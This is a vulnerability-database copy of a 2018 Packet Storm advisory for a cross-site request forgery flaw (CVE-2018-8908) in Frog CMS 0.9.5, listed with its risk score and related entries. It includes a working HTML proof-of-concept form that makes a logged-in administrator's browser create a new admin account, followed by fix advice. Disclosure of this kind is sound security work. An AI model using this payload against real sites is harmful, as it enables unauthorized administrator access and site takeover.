Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSamrat DasPACKETSTORM:146981
HistoryMar 31, 2018 - 12:00 a.m.

Frog CMS 0.9.5 Cross Site Request Forgery

2018-03-3100:00:00
Samrat Das
packetstormsecurity.com
25

0.002 Low

EPSS

Percentile

56.0%

JSON
`# Exploit Title:aa Cross Site Request Forgery- Frog CMS  
# Date: 31-03-2018  
# Exploit Author: Samrat Das  
# Contact: http://twitter.com/Samrat_Das93  
# Website: https://securitywarrior9.blogspot.in/  
# Vendor Homepage: https://github.com/philippe/FrogCMS  
# Version: 0.9.5  
# CVE : CVE-2018-8908  
# Category: Webapp CMS  
  
  
1. Description  
  
The application source code is coded in a way which allows malicious HTML  
request to be executed without veryifying source of request.This leads to  
arbitary execution with malicous request which will lead to the creation of  
a privileged user.  
  
2. Proof of Concept  
  
Visit the application  
Visit the Add Users Page.  
Craft an html page with all the details for an admin user creation  
and host it on a server  
Upon the link being clicked by a logged in admin user, immidiately,  
another admin user will get created.  
  
Exploit Code:  
  
<html>  
<body>  
<form action="http://localhost/frog/admin/?/user/add" method="POST">  
<input type="hidden" name="user[name]" value="Test_1" />  
<input type="hidden" name="user[email]" value="" />  
<input type="hidden" name="user[username]" value="test" />  
<input type="hidden" name="user[password]" value="test" />  
<input type="hidden" name="user[confirm]" value="test" />  
<input type="hidden"  
name="user_permission[administrator]" value="1" />  
<input type="hidden" name="commit" value="Save" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
3. Solution:  
  
Solution - Fix & Patch: The application code should be configured to  
implement anti csrf token to filter malicous HTTP Requests.  
  
  
4. Public Reference with POC and steps:  
  
http://securitywarrior9.blogspot.in/2018/03/cross-site-request-forgery-frog-cms-cve.html  
  
Thanks and Regards  
Samrat  
  
`

Related

exploitpack 1
prion 1
nvd 1
cve 1
cvelist 1
zdt 1
exploitdb 1
exploitpack
exploitpack
Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)
2018-04-02 00:00:00
prion
prion
Cross site request forgery (csrf)
2018-03-31 22:29:00
nvd
nvd
CVE-2018-8908
2018-03-31 22:29:00
cve
cve
CVE-2018-8908
2018-03-31 22:29:00
cvelist
cvelist
CVE-2018-8908
2018-03-31 22:00:00
zdt
zdt
Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User) Vulnerability
2018-04-02 00:00:00
exploitdb
exploitdb
Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)
2018-04-02 00:00:00

0.002 Low

EPSS

Percentile

56.0%

JSON
Related for PACKETSTORM:146981
exploitpack1prion1nvd1cve1cvelist1zdt1exploitdb1